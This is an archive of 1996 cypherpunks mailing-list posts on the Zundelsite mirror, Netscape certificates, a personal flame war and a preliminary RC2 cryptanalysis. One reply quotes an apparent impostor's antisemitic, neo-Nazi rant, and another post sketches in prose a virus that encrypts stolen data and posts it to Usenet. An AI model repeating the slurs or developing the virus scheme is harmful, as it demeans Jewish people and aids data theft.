      level, and fostered entrepreneurship through intelligent
      government planning. Russia's ruling class were 
      hoodwinked by a phalanx of mainly US and UK advisers 
      urging a "shock therapy" of destroying existing 
      economic and political power-bases. The result has been 
      a deep tragedy.

   2-3-96. EcoMist:

   "Why is the Internet so slow; what can be done about it?"

      At present there is no answer, only a few expedients to
      limit traffic on congested routes, say, with "caches".
      However, Web site owners object to providers caching
      their wares, because it robs them of valuable
      information about their viewers -- the sort that
      advertisers demand. The caches have, in effect copied
      these pages without their owners' permission, and are
      showing them to others without their owners' knowledge.
      But faced with an Internet meltdown copyright violation
      may be the least of their worries.


   GNU_kum (for the three)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Sun, 4 Feb 1996 09:35:22 +0800
To: cypherpunks@toad.com
Subject: Zundelsite webcom.com <--> Germany routing difficulties resolved
Message-ID: <199602040116.RAA28239@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Zundelsite "censorship" issue has been resolved. We have a permanent home
for the site that will not be blocked or harassed by the site management. We
will help Zundel remove the shrill "I am being censored!" claims from his Web
pages.

More details will be forthcoming on Monday.

- -rich

$ From llurch@networking.stanford.edu to cypherpunks@toad.com $
$ Sat Feb  3 17:15:16 PST 1996 $

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRQIz43DXUbM57SdAQFVlwQAxC4ywUESFZMf/dFBtK2z0I3WpU/Q4n9F
UucUtgqq66J0sPV3erneyh/Po9N0UfH/bYhYhfT3ubdUTwUIGDY0OaPtrB5ymUe1
9JtlBqJd4l9YrWJAkM4NSw7zZWaLjnoh9sly1LCZu+YAZUxZJVCyyC8YLPnqAeYs
DI6c/F0Llfs=
=mZaO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Sun, 4 Feb 1996 01:11:49 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Il4cDhyMc50eR5gdEN@nsb.fv.com>
Message-ID: <199602031655.RAA18445@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



The "keyboard sniffer" of FV is really troublesome, and the
extension of this threat will hamper the Internet Commerce
tremendously, I believe. The thing that might have made it
hard to accept the threat for cypherpunkers is that it was 
presented together with a plug for the FV scheme, (which may 
or may not be valid btw.)

But more generally, I see the following happening.

The factors that now are "harmonizing" are;
* the tremendous growth of Inet commerce; Digicash, encrypted
  CardNo's etc. Many of the now proposed schemes have no
  independant "evidence" mechanism, whereby you can settle
  a disputed transaction fairly. You will have to choose
  to believe one of the parts, and that is very often the
  service provider/bank/card company.

* The decline of the "ordinary" card fraud market,
  VISA/Europay/Mastercard is rapidly finishing their
  forthcoming smart card systems. I'd guess this "market"
  is gone within 2-3 years. Some "big organisations" might
  start to move into the new "fraud markets" soon.

* The fact that the PC are such an extremely used platform,
  and that the need for back compatibility will make it
  almost impossibe to add substantial security to it now.

* The fact that anti-virus tools haven't been able to
  eradicate the virii problem even before the "forthcoming
  surge" in virus writing that I believe will come. According
  to a survey by Information Week (Nov 27 -95) 67% of the 
  companies had been hit by a virus the last year, and 12% 
  of the companies had suffered financial loss caused of it. 
  (1293 companies surveyed). 
  Admittedly there are social problems behind the continued spread
  of virii too, but that alone doesn't make them go away. Take
  a look at the article "Virus Authors strike Back" by Alan
  Solomon in "Computers and Security" 11 (1992) 602-606. The
  state of anti-virus tools seemed to be in a rather sad state
  back then, and I really wonder whether they are any better
  now.

* The knowledge about how to write virii has been spread
  rather far - a college kid can get his hands on one of
  the polymorphic virus generators, and start to output
  new self-encrypting virii with the same action routine
  regularly. Also, note that this new kind of virii ("virii
  with a mission") would start to cost immediately, in 
  contrast with the "old kind" that only cost when you 
  have to clean them out, or if they wipe un-backuped data.
  (your fault - core dumped)

* All PC's will be net-connected... Embed a public key in the
  virus, let it encrypt the loot and post it to Usenet
  in the group junk.erotica. You can then harvest the group
  with the secret key anywhere in the world.
  (Be generous, let the virus go away automatically if it
  has "contributed" enough money.)

The pay-off of continously updating your virus to cope with
new protection mechanisms would be enormous. Lets assume that I
employ 10 programmers 2 years from now, that writes new action 
routines and develop new virus types... I bet I could get 
a decent living quite soon. Also assume I settle down in a 
suitable country with lax enough laws, do you believe that I
would be a criminal then? What is the legal status of virii,
and what is this concept of "electronic money" anyway? :-)

I promise, I wont do that. It's not a bet.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cecelia A Clancy <cacst9+@pitt.edu>
Date: Sun, 4 Feb 1996 07:25:26 +0800
To: ErnstZundl@aol.com
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960203124656_311380557@emout09.mail.aol.com>
Message-ID: <Pine.3.89.9602031749.A1161-0100000@unixs6.cis.pitt.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 3 Feb 1996 ErnstZundl@aol.com wrote:

Ernst Zu"ndel's e-mail address is ezundel@cts.com.  He is on on
AOL to me knowledge.


> THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
> 
> Recently several Jewish co-conspirators have tried to silence
> me!  I finally go onto Usenet to make myself open for debate,
> and the Communist conspirators write to the AOL postmaster
> and ask that they remove my account!
> 
> Below are some messages I received from some of those
> people who do not believe in Free Speech.  *I* believe in 
> Free Speech.  Without Free Speech, I would be unable to
> declare which books I feel should be burned, who should
> be persecuted, and who should be declared to be inferior
> or part of a race-wide conspiracy like the "Holocaust."


The above text does not feel like Zu"ndel to me.  I think
that this ErnstZundel@aol.com might very well be an imposter.
The above is not the real Zu"ndel's speaking or writing
style.  Zu"ndel does not want books burned and people persecuted
nor does he want certain races and ethnic groups declared
inferior.

Zu"ndel more likely to complain about hypocricy and lack of tolerance
than lack of capitalized Free Speech. (At least according to
what I have been exposed to of him.)

 
> Please do not send email to the people who complained
> about me.  I beleive in Free Speech, and so I believe in
> their right to complain about me.  I also believe that it
> just demonstrates that they are willing Fellow Travelers
> in the worldwide Communist Conspiracy, they are friends
> of the Black Helicopters of the United Nations, and they are
> enemies of the Aryan Nazi UFO's at the center of the Earth.
> 
> Now, fellow Patriots and Supermen Aryans, read their
> messages and tell me what you think?
> 
> >> Subj:  Re: TOS violations
> >> Date:  Mon, Jan 29, 1996 8:23 PM EDT
> >> From:  freedom@pathcom.com
> >> X-From: freedom@pathcom.com (Marc Lemireberg)
> >> To: postmaster@aol.com
> >> CC: ernstzundl@aol.com, Mossad@israel.gov


Mossad?  Come on, get real.  The real Mossad would have an address
that ends in .il.   The ending .gov is for US government agencies.

"Do not write to these people", huh.  Well, I wonder if this is
because some of these addresses might all be fake?  I'll try sending to
them to see what happens.
Lemineberg!   That's a spoof on "Mark Lemire" a guy who really
works with the real Zu"ndel.

> >> *******************************************************
> If you are a *true* Patriot, and a *true* Aryan, then you *MUST*
> make the journey to Antarctica and into the volcano!!  We owe it to
> the world, we owe it to the great Adolph Hitler, and we owe it to
> the White Race.

Sorry, but the guy with the Charlie Chaplain mustache spelled his
first name "Adolf", not "Adolph."  The real Zu"ndel would not
make this misspellilng.


Cecelia Clancy
University of Pittsburgh

cacst9+@pitt.edu
+1 (412) 441-2231







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cecelia A Clancy <cacst9+@pitt.edu>
Date: Sun, 4 Feb 1996 07:40:31 +0800
To: ErnstZundel@aolcom.toad.com
Subject: Ok Fake Ernst!
In-Reply-To: <9602031850.AA18675@frumious-bandersnatch.MIT.EDU>
Message-ID: <Pine.3.89.9602031837.A1161-0100000@unixs6.cis.pitt.edu>
MIME-Version: 1.0
Content-Type: text/plain



Lets see how many of these names bounce back.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 4 Feb 1996 10:45:26 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <199602030951.BAA12320@ix2.ix.netcom.com>
Message-ID: <31141581.69C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein wrote:
> The Navigator can also download certificates as one of the following
> mime types:
> 
> application/x-x509-ca-cert
> application/x-x509-server-cert
> application/x-x509-user-cert
> 
> When the Navigator sees one of these, it presents the user with a
> series of dialog boxes that take him through the process of approving
> the certificate and adding it to the database.

  The only one of the above mime types that should be used with 2.0
is application/x-x509-ca-cert.  The others are not supported.  The
spec for the ca-cert type will be released on our web site soon.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 4 Feb 1996 10:59:32 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [noise] Re: Charter of PDX Cpunk meetings
Message-ID: <m0titwB-0008zAC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:03 AM 2/2/96 -0800, Alan Olsen wrote:

>I think an explanation for this is due.  Jim is going to move his complaints 
>here instead of dealing with them with me no matter what I do...

Alan Olsen is correct, here.

>
>A bit of history here...
>
>I had seem Jim Bell's postings and had not thought too much about them one 
>way or another.  I felt that some people had been a bit too hard on him, but 
>did not care one way or another.
>
>I organized a physical meeting on Jan 20th at a public coffee house in 
>portland.  Jim showed up.  During this meeting he espoused some ideas which 
>I found very bothersome because they sounded far too much like "magical 
>thinking" and pseudo science. 

Alan Olsen will be amazed to see that I am absolutely agreeing with his 
limited understanding of the description of the events of the meeting.  
Further, I am acknowledging that I said certain things which, to the vast 
majority of the population, and ESPECIALLY moderately-technically educated 
ones, would sound like "magical thinking and pseudo science."  Even to 
extremely well-educated ones, in fact.  This sounds strange, but it is true. 
 But of course, I only told him PART of the story.  It is as if David 
Copperfield (the magician, not the Dickens character) claimed that he was 
going to make an elephant disappear:  The claim sounds impossible to 
believe. Logic tells us he can't do that.  But, on the other hand, he has a 
reputation as a "magician."   The difference, obviously, is that the name 
"David Copperfield" is far better known than "Jim Bell."

Of course, I am embarrassed to have to admit that I can't recall the name of 
the person who said something like, "A sufficiently advanced technology is 
indistiguishable from magic."  Perhaps somebody more "into" SF quotations 
can supply the reference.

Regrettably, I fear Alan Olsen (being exposed to talk which at the time he 
interpreted as "magic") will mis-remember the details of which I spoke. 
Actually, in the short term this is good.  Fortunately, I recall what I said 
quite well, and it will all become clear eventually.

As I kept saying in my (not-yet-canned) tagline:

Something is going to happen.    Something....Wonderful!   (2010)


>I did not challenge him about them at the 
>meeting and tried to move on  to other things.

Alan Olsen is correct, here.  He did not indicate the extent of his 
disbelief.  Perhaps I would have been willing to tell him more if he'd 
politely approached me after the meeting with his doubts.  Maybe not, however.
It's not really a deep-dark secret.

Instead, Alan Olsen flamed me on this national list, despite myself having 
done nothing to him (either in public or private or private email) to 
justify this.  In case there is any doubt here, I hereby give him permission 
to post any past and/or future (private) email from me to him that he may 
care to quote, which in his opinion "justifies" his acts of flaming.  
Furthermore, I give a blanket permission to anybody reading this message to 
publish on this (or other, more appropriate list) any private email from me 
which would, itself, "justify" or explain, pre-facto, Alan Olsen's odd 
behavior.

In other words, Alan Olsen has bought the rope, and has tied it to a branch 
on the tree, and is now asking permission from me to hang himself.  He has 
my permission.

>A while ago an anonymous poster made a number of comments about Jim Bell's 
>beliefs involving assassination politics.

And my response was that unless he (the anonymous poster) was unwilling to 
at least use a stable nym to stick around long enough to debate the details 
on some SUITABLE area, his criticisms were no more realistic than flames. 

>  He brought up a number of valid points. 

But he (the anonymous poster):
1.  FLamed me on this national list, similarly to the way Alan Olsen later did.
2.  Failed to be willing to sustain the debate in a more appropriate list, 
even under a stable nym.
3.  Didn't stick around to respond to my commentary.

> Jim ignored all of those points and flamed him on something totally 
>without substance. 

Others apparently disagree.  I received supportive (private) email, agreeing 
that I had been flamed by that anonymous poster.  The fact that he was 
anonymous says it all.  The fact that he has not returned says it all.  The 
fact that Alan Olsen is bringing up this example as if it is some sort of 
fault of mine incriminates Alan Olsen most of all.

> (Not signing messages and not using an identifiable 
>nym.)

If that's all that he did, then it wouldn't have been a problem.  I suspect 
that Alan Olsen had something to do with that anonymous post; in fact, I 
suspect that he knows who sent it.  Alan's following commentary sounds like 
an admission that he, himself, did it.

>This bothered me.

Your general behavior bothers me.

> I responded to the post.  A good portion of this message 
>was flame, but it contained a number of questions about the workability of 
>Jim's pet theories.

Justa sec.  You're admitting that a person  (YOU?!?)ANONONYMOUSLY posted to 
Cypherpunks, with a "good portion" of what even you are willing now to admit 
was a "flame", and yet you fault ME for my response to it?

Pardon me for a few minutes while I try to stop laughing, Alan.  


>Jim's response to this was to question the validity of the post, but not 
>deal with any of the substance of the arguments.

Which I believe is the logical thing to do.  For a number of reasons.  
First, I am well aware of the primary purpose of the Cypherpunks list, and 
the fact that I am relatively new here.  I have no intention of inflicting 
an unwelcome discussion of "Assassination Politics" on the list, and 
certainly not with a person who clearly wanted to start a flamewar and 
didn't genuinely want to debate the issues with even a stable nym.

Clearly, I recognized that if I responded to the bait and clogged 
Cypherpunks with off-topic (or numerous marginal-topic ones) then this 
flamer would already have won by sowing hate and discontent, and have not 
suffered any longterm loss of reputation of his own.  I, on the other hand, 
use my REAL NAME.

Only a fool would have taken an anonymous flamer seriously under those 
circumstances.


>  (He was questioning it 
>because I did not sign the posting.) 

You're admitting it, huh?

> I ignored the post as I had other 
>things occupying my time...

In other words, you took the time to flame me, but when I failed to take the 
bait you lost interest and went on to something else, huh?  Interestingly, 
subsequent to that event, both you and a number of your clique "lose 
interest" very quickly when things turn against you.  How...conveeeeenient!


>During the period of time between the meeting and the offending post I had 
>created a pdx-cypherpunks list.  I had a number of people who were 
>interested and it seemed like a good idea at the time...

What you REALLY wanted to do was to create your own little fiefdom where you 
could punish non-believers, a privilege which does not accrue to you on the 
national list.  


>Well, i posted on the list a question about the next meeting and mentioned 
>about  the results from the key signing.  (I had three people, who i did not 
>mention by name, who had not signed keys or gotten back to me on it.)  I 
>relieved a response from Jim about my messages to him here and why he had 
>not signed anyone's keys.  [For those who are interested, I can forward the 
>original messages.  They are interesting reading, in an odd sort of way...] 

You have my permission, BTW.  Go ahead and post them.  And this message will 
be signed.


> It came down to him complaining about my messages on national list.  He 
>still did not address any of the issues I had raised (he still has not), but 
>was pretty pissed.

Yes I was "pretty pissed."   But since you've now basically admitted that 
you were the anonymous flamer, as well as having flamed me on Cypherpunks 
without justification, under the circumstances I don't think you have pretty 
much destroyed your own credibility.  I assume people on Cypherpunks don't 
want anonymous flaming, and they wouldn't have appreciated it if I'd taken 
your bait and abused my position here.


>A number of the other people on the list took him to task on a number of the 
>comments he made. 

In other words, Alan Olsen's clique decided to help him out of his jam.  
He'd screwed up by flaming me nationally, and he disappeared for a few days 
while his cronies tried to pretend that it was all my fault.

> It grew into a pretty hot flame war on the list.  After I 
>started to get complaints and it prevented anything useful being posted,

Read:  "After my credibility had been shot to pieces...."

> I posted a message to take the discussion to e-mail or I would start banning 
>people from the list.

Read:  "I don't want anybody to know what I did, Jim.  Stop reminding people 
about it!"

>Jim ignored that request and I removed him from the list.

Read:  "Alan Olsen exercised his authority in his own personal fiefdom, the 
"PDX Cypherpunks list."

>
>That is why it has moved back here.

That's a very interesting admission, Alan.  While I'm sure that some of the 
people around here are interested in your character faults, baiting, 
flaming, and crude anonymous posting, most of them probably want this 
discussion off the national list and onto a local one.  Problem was, you 
couldn't even accept getting embarrassed locally, despite the fact that I 
was willing to maintain this as a local issue.  You were clearly afraid that 
your credibility would be destroyed by a serious discussion of your actions, 
so you couldn't even accept limiting the discussion to the local list.

>This will be my last response to Jim's rantings in public. 

Read:  "Things are bad enough as it is!  I'd better cut and run."

> i will be glad 
>to deal with questions in e-mail.

On the contrary, I have no interest in dealing with this sleazy character in 
email.  He was the one who chose a national list to do his flaming and 
baiting, and I think he deserves full "credit."

>  I have sent a number of responses to Jim 
>already in e-mail and he has ignored them.  He has made veiled threats to me 
>on the pdx list and has shown no sign of wanting to deal with this in a 
>rational manner.

Alan, please re-post these "veiled threats."  Let's see how you interpreted 
them as such.  Please explain your reasoning.

Above, you accused me of "magical thinking and pseudo science."  Let's see, 
maybe I ought to get out my set of voodoo dolls and poke a few pins in them...

Feel that, Alan?  And that?  And that?  


>The issue comes down to this.  Jim Bell has a number of ideas i disagree 
>with.  I have challenged him on some of those ideas. 

Anonymously, with flames, on a national list on which the discussion did not 
belong, anyway.   I, recognizing this, attempted to spare the rest of you 
Olsen's rants.

> He is unwilling to 
>answer any questions as to the flaws in his beliefs.

Alan Olsen is unwilling to apologize for his behavior.  He was unwilling to 
debate as a stable nym, even.  Clearly, he did not want to genuinely debate 
the issues involved.

>  Instead, he takes any 
>questioning of his ideas as personal attacks. 

No, I take unjustified (and anonymous) flames on Cypherpunks as attacks not 
only on myself, but on the rest of you people.   The only reason this 
discussion came back is that Alan Olsen's personal fiefdom was not strongly 
enough controlled by him, apparently, to help him out.

> I refuse to give any respect 
>to an individual who presents his ideas to the world and yet is unwilling to 
>defend them in public (or in private).

That's an odd statement from a person who wasn't willing to debate as a 
stable nym.  I'm using my own name.  And if there are any of you who have 
any residual doubts about my willingness to debate my ideas, I recommend 
that you ask the regulars on the FIDO areas DEBATE, CIVLIB, CONTROV, 
LEGAL_LAW, LAW, POLTITICS, and a few others.  While I haven't posted much in 
the last couple months there, I copied most everything to those areas and 
received many responses.  I responded, there, even to flamers if the "tone" 
of the "echo" (FIDO's term for what Internet people generally call a "list") 
allowed it.

>I suggest you get your killfiles ready.

I suggest that we regularly warn subsequent "newbies" about Alan Olsen and 
his misguided set of "ethics."

>  I will be killfileing Mr. Bell's 
>comments on this list as it does not belong here.

That's illogical.  What you really meant is that you don't want to hear the 
truth.  What you REALLY would like to do is to control EVERYBODY ELSE'S 
killfiles, so as to silence me.

>The following is the last I will say publically on the matter.

You're going to take your bat and ball and "go thwait home!"  You hear your 
mommy calling, Alan.

Jim Bell
jimbell@pacifier.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRQVtPqHVDBboB2dAQGCkAQAqXcN+lTsICS69k5t+43wwm37Em4OHmsJ
P1+HPPjQColXiboVKdXMhHt2qi9xOnGiU62ih0qnI8M2KO5FDw0GqmLqj47ERDjO
9xe/ykXBCutL65CSDIGpIBujToKHHxMRVTEV0uzdS9+W6/JUOG9HnctoFuFnpUUl
+f0rwqCH3PY=
=wZyv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 4 Feb 1996 07:47:05 +0800
To: cypherpunks@toad.com
Subject: [philosophy of censorship] Re: Imminent Death of Usenet Predicted
Message-ID: <9602032325.AA07317@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Jordan wrote to me today:


>Hey, I tried to explain this, but you missed it:

     Apologies, I did miss part of your point.

>I *know* that a *huge* percentage
>of the population in this country does (sorry for being USA-centric,
>but we have [at least for now] the largest net population, so you
>can see how this will go ...).  

     Should the absolute number of peoples 'wishing' something relevant?

>Therefore, I'd like to see a way
>for the default be that kids (dare I say everyone!) don't *automatically
>stumble upon* it in the open network.

     I find the sentence a bit strong, here.

>I think that if the
>majority of the people in a community don't want the default behavior
>to be "click here for tits!" 

     They can subscribe to a net provider that restricts access to such newsgroups.
If this restriction is circumvented by the kid, don't you think that the said 
kid will find ways to get whatever he/she wants no matter the laws?

     They also can choose the ultimate solution: not to be on the net.

>then it's up to us, as technologists,
>to provide easy-to-use mechanisms for those who do want to see them
>to not infringe on those who don't.

     *THAT* is the thing I have most problems to.  This sentence is 
boobie-trapped.  Let's me state, for the book (or maybe hard drive),
that I do not subscribe to this view of Man.  I believe that 
selfishness is a virtue and that altruism is at best a psychological
problem.  Why is it that us, technologists, thoses who know and can, 
have a duty to thoses who cannot?  This does not contradict good 
commercial practices.  If there is a *demand* then, there is a market.
Any producers does follow the demand very closely or he gets out of 
business.

     But govt intervention, rules, standards, etc are *all* enforced 
at the point of a gun (even if deeply hidden under a pile of red tape).
This view implies that *because* you can produce, you have a duty to the
one who cannot.  It means that if you can produce, your duty is to become
a cattle for the benefit of others.  If you cannot produce, you have every
rights.

     In today's political climate, the whiners, complainers and decryier
are god.

     When is it that thoses who get sucked by the collectivists leeches
will say : Enough!  I am fed up to owe any drifter the best of my life!


> <...> porno <...>  you can rent it <...>  But most people
>don't want it by default to be on channel 7.  
>Last time: I *personally*
>am not one of them, but it's important to see what the majority
>thinks on this issue.

     I agree with you on this one: wouldn't it be wonderfull to have porno
movies on channel 7 ...   sigh...  :->


     Actually, just as I mentionned, every entities that seeked to control
man used guilt to do so.  And by the nature of guilt, sex and human mind,
sex is *the* best thing to induce guilt.

     Since a large part of the population *are* controlled through the sex-guilt 
association, it is 
extremely handy to create the pseudo-justification the govt need
for their actions.

     But as I said previously, the biggest threath to the govt is that peoples
can now find each other and talk together.  Previously, we had the means to
talk but no means of finding each others.  The Internet provides this.



>Yes, if your communications
>are important to you or you are a potential target of investigation,
>you should know it's not private.  But it's not like any significant
>number of phone calls are tapped, by the government or otherwise.
>And it's not likely to happen, either, because NONE CARES WHAT YOU
>SAY TO YOUR FRIEND ON THE PHONE.

     Unless you discuss about how freedom of speech should go unbreached...


>	>And don't forget: if you have privacy, you don't need anonymity.
>	>Swiss banks provide the ultimate example.


>You can get a numbered account at a Swiss bank by showing up at
>the branch, introducing yourself to the branch manager, proving to
>him who you are, and signing some papers.  They will keep your name
>out of any transactions you make, but they *know you* ... this is
>not anonymity; this is merely privacy.

No, for all it matters, it is anonymity.  Because the swiss banks does
not publish the name of accounts holders.  The recent case of German 
police raiding homes of german citizens working in Lischtenstein(?)
banks shows that, far all that matters, theses banks accounts are 
anonymous, i.e. there is no way for the german govt to know the name
of the accounts holders.   Their only way to gain knowledge is through
the use or threath of physical violence.


>Don't forget: the fact that "porno on the net" (for instance) is
>an issue *at all* is a *failure* of technology.

     Sorry for my stupidity, but I *completely* fail to understand.
Would you please explain what are your basis for stating so?


>  It would be a
>non-issue if USENET wasn't essentially a technology vacuum.

     I find this a bit strong, but since I did not understand the previous
statement, I will refrain from commenting.


Regards to all CPunkers

JFA
Existence exists, Reality Is.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 4 Feb 1996 10:40:49 +0800
To: cypherpunks@toad.com
Subject: Re: Zundelsite webcom.com <--> Germany routing difficulties resolved
In-Reply-To: <199602040135.SAA19463@sal.cs.utah.edu>
Message-ID: <Pine.ULT.3.91.960203180531.27718I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 3 Feb 1996 the Bcc'd dude wrote privately:

>  Just for the fun of it, could you make your access statistics
> public? In particular, I'd like to know how many hits you 
> got from inside Btx.DTAG.DE.
>
> I have a strong suspicion that the intersection of those
> who can afford to browse the web through T-Online for 12-16 Pf/min
> (ca. 9-12 cents) with 2.400 bps (except in major cities, where
> it's 14.400) and those who are interested in neo Nazi web sites,
> faked or not, might be smaller than expected.

Good question! Something that not enough people are asking.

There were like two or three dozen hits. Period. But I think Declan 
publicized his mirror more widely, and probably got a few more.

You can get aggregate hit counts for all files in "/~llurch" through the 
www-leland.stanford.edu main page (features, I think).

I'm not sure I'll be able to get a server log dump because it would just
be so huge -- not because of the Zundelumpen, but because of the Windows
95 FAQ in my directory, which got a lot of press in early January. 

Zundel's main site at webcom.com did not just become popular and
overloaded with the press reports. It has always been overloaded because
he's a dumbshit who posts 3MB RealAudio files on the main page. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRQWUo3DXUbM57SdAQHUZAQA2C5Bwg2lrpdHoXgs0+H1X3G7ssVO3Yyr
1ZfqSUO/HOrBDqzxh0hSnbt6DdrpfRvC1yO3ObEsV7sr3yQ4MfjOu8KhWptZpLiC
NlPveSWDN6/EiDGhueAyflUmSINuHHgZguaJnQDtihIUrz3pIg7dRT2mM4vWZV/m
Fk5CxWGbhgg=
=PdRm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 4 Feb 1996 08:06:43 +0800
To: tcmay@got.net
Subject: Re: Noise and the Nature of Mailing Lists
Message-ID: <01I0SBIKF1HCA0UTZ4@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 31-JAN-1996 00:44:48.72

>However, and current subscribers will no doubt jump in and give their
views, I hear that the current volume of messages is less than one per day,
with--according to my sources--sometimes days between messages. (I also
hear that the Extropians are devoting more of their energy to their
magazine, which may also be a factor.)
------------
	Actually, I'd guess that the recent problems with the mailing list
software are the problem. I got signed off of there when I changed mailing
addresses, and they haven't been able to put me back on. If it's that
low-traffic, I may see about requesting it from them again.
------------

>And remember, it's a whole lot easier using filters and reading tools to
reduce the volume of messages on an active group than it is to get an
inactive group up to critical mass!
------------
	One idea is to set up two lists, one of which has an automatic
filter that forwards stuff to another list... I'm currently trying to set that
up for another list I'm on. Something to keep in mind is that irrelevant
discussion can chase people off... what's happened to the list I mentioned.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Feb 1996 09:51:00 +0800
To: cypherpunks@toad.com
Subject: Futplex makes the news!
Message-ID: <ad394c24020210049b23@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:00 AM 2/4/96, lmccarth@cs.umass.edu wrote:

>Meanwhile, I think I can safely say that from this point on I need to dot
>all my i's and cross all my t's until I graduate from UMass. Suppose it
>turned out that no-one wanted to sit on my thesis committee ?  I'm sure
>anyone who's been through grad school can imagine other disturbing
>hypothetical scenarios.
>
>James Donald may characterize me as gutless. I think he would probably be
>correct to some extent.

I think Lewis McCarthy was very brave to put up the Zundelsite mirror.
(Maybe unwise, too.) It's certainly not something most of the rest of us
are doing on our sites at universities, corporations, and even private
sites.

(Many ISPs will drop a customer who creates any trouble.)

And it's sad that the couple of days of the UMass Zundelsite's effect, even
now being lost in the "spin" coming from the German press about how UMass
forced the removal of the site, will perhaps result in a much lower public
presence by Lewis. (From what I've seen at California universities, the
folks with the long knives will still be trying to "get him."
Unfortunately, with search tools like Alta Vista they can keep tabs on him
semi-automatically and report any further evidence of his racist,
mysogynistic, and anti-democratic views to the Dean of Students.)

(I could add a smiley here, but it's really not very funny.)

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sun, 4 Feb 1996 08:39:58 +0800
To: cypherpunks@toad.com
Subject: RC2--Some very preliminary analysis
Message-ID: <01I0SDBW5VYY984JFR@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: sci.crypt, cypherpunks ## Date: 02/02/96 06:21 pm ##
  Subject:  Alleged RC2--some very preliminary analysis ]

I just wanted to post some corrected comments here, regarding
alleged-RC2.

1.   The best differential characteristic I can think of looks like
it will have a probability of 2^{-4} per round.  It's a one-round
iterative characteristic.  In my earlier post, I miscalculated this
to be 2^{-8} per round.  Sorry.

2.   Each round of RC2 represents four "steps."  This means that RC2
has 64 "steps," the same number as MD5.  (I find this interesting,
since MD5 has twice as many bits to diffuse through, and the
attacker can choose its key, but not its input block.)

3.   I don't see how to build useful linear characteristics.  Our
S-box is one bit wide.  There may be some very low-round confusion
failures, but they don't seem particularly useful here.  I'd like to
hear from anyone who can see a way to do a linear attack here.

It looks to me (though I haven't spent enough time to be certain)
that the best differential characteristics to push through the block
are going to be one-bit characteristics.  (These are certainly easy
to analyze.)

Let's throw some terminology in here:

This is one step:

A = rotl(A + f(B,C,D) + sk[i], 1);

A round is all four of these steps.  In the step above, A is the
target block (it's the one that's getting stomped by the other
values) and B, C, and D are the source block.  f(B,C,D) is the
bitwise-select function.  For each bit position i, if B_i is a one,
then f_i = C_i, otherwise f_i = D_i.

Now, when a one-bit difference is anywhere in the target block (the
block getting all the stuff added into it) except for the high bit,
its probability of not propogating to other bits in that block seems
to be about 0.5.  (This is just based on its chances of affecting
the carry into the next bit position.)  When the flipped bit is the
high-order bit of the target block, it has no chance of propogating.
When a one-bit difference is in the source block, if the rest of the
bits are approximately random, then it has a 0.5 probability of not
affecting the target block at all.  If it does affect the target
block, it has a 0.5 probability of only affecting one bit in that
block.

Note that I messed up the calculations in my earlier post on RC2 by
combining these three events in each round.  Let me try to fix that:

We flip some bit, t, making certain that if this bit doesn't
cause other bits to change, it won't ever affect the low six bits of
any block during rounds 4 and 11, when it would have a radical
effect on the encryption process.  (In other words, we choose an
input XOR delta with only bit t on.)  This bit then has the
following effect:

